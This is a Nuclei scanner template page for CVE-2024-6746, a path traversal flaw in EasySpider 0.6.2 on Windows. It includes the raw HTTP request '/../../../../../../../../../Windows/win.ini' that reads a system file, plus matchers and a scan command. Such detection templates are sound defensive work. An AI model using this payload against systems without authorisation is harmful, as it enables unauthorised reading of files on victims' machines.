Skip to content
Nuclei Templates

EasySpider 0.6.2 - Arbitrary File Read

ID: CVE-2024-6746

Severity: medium

Author: s4e-io

Tags: cve,cve2024,lfi,network

Description

Section titled “Description”

A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: ’../filedir’. The attack needs to be done within the local network.

YAML Source

Section titled “YAML Source”
id: CVE-2024-6746


info:
  name: EasySpider 0.6.2 - Arbitrary File Read
  author: s4e-io
  severity: medium
  description: |
    A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.
  reference:
    - https://github.com/NaiboWang/EasySpider/issues/466
    - https://cvefeed.io/vuln/detail/CVE-2024-6746
    - https://vuldb.com/?id.271477
    - https://vuldb.com/?submit.371998
    - https://vuldb.com/?ctiid.271477
    - https://github.com/NaiboWang/EasySpider
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-6746
    cwe-id: CWE-24
    epss-score: 0.00045
    epss-percentile: 0.1594
  metadata:
    vendor: naibowang
    product: easyspider
  tags: cve,cve2024,lfi,network


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /taskGrid/tasklist.html HTTP/1.1
        Host: {{Hostname}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Task List","Task ID","Task Name","URL","<title>任务列表 | Task List</title>")'
          - "status_code == 200"
        condition: and
        internal: true


  - raw:
      - |
        GET /../../../../../../../../../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions")'
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450221009ca01a0d08edbfc52a4020864c0de6b80e8c1965b469d71fbd9ddee61358b8070220329c490d40b4eac007228e523d7b636ca4f3acad6ed54e8a9dc0c12fdcd41f74:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6746.yaml"

View on Github